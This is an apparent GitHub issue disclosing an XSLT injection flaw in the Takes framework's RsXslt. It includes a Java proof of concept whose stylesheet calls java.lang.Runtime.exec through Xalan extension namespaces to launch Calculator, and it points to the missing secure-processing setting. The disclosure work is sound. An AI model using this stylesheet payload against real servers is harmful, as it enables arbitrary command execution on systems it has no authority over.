
Takes framework has an XSLT injection vulnerability. #1293

Open c1gar opened 4 months ago

c1gar commented 4 months ago

The Takes framework is vulnerable to XSLT injection: the snippet below gets a stylesheet to call into `java.lang.Runtime` through the Xalan/XSLTC `java/` extension namespaces, which suggests the `TransformerFactory` behind `RsXslt` is created without `XMLConstants.FEATURE_SECURE_PROCESSING` (the standard setting that makes the JDK's XSLTC reject such extension-function calls). Whoever controls the stylesheet that `RsXslt` applies — in the snippet that is the caller's own `URIResolver` lambda, but in a deployment it is any stylesheet content or `href` a request can influence — can therefore run OS commands with the privileges of the server process. The payload `open -a Calculator` is macOS-specific; the screenshot below shows its effect.

package org.example;

import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.transform.stream.StreamSource;
import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;

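public class SimpleTakesApp {
    /**
     * Proof of concept: feeds {@link RsXslt} a stylesheet that calls
     * {@code java.lang.Runtime#exec} through the Xalan {@code java/}
     * extension namespaces and prints the transformed body.
     *
     * <p>The stylesheet comes from this program's own {@code URIResolver},
     * so the demo stands in for any deployment where stylesheet content (or
     * the {@code href} it is resolved from) can be influenced by a request.
     * The command {@code open -a Calculator} is macOS-specific; elsewhere the
     * exec call fails or launches nothing.
     *
     * @param args Ignored.
     * @throws IOException If reading the transformed body fails.
     */
    public static void main(final String[] args) throws IOException {
        final Text xml = new Joined(
            " ",
            "<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
            "<page><data>ура</data></page>"
        );
        // NOTE(review): the "java/" extension namespaces let XPath reach any
        // JVM class. Per the JDK's XSLTC documentation, a TransformerFactory
        // with XMLConstants.FEATURE_SECURE_PROCESSING enabled refuses these
        // calls; RsXslt builds the factory internally, so that check cannot
        // be applied from this caller — which is the gap this PoC shows.
        final Text xsl = new Joined(
            " ",
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
                "   <xsl:template match=\"/\">\n" +
                "     <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
                "     <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
                "     <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
                "     <xsl:value-of select=\"$processString\"/>\n" +
                "   </xsl:template>\n" +
                " </xsl:stylesheet>"
        );
        // body() returns a stream the original never closed; the resolver
        // ignores href/base and always hands back the malicious stylesheet.
        try (InputStream body = new RsXslt(
            new RsText(new InputStreamOf(xml)),
            (href, base) -> new StreamSource(new InputStreamOf(xsl))
        ).body()) {
            final String transformed = IOUtils.toString(
                body, StandardCharsets.UTF_8
            );
            System.out.println(transformed);
        }
    }
}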
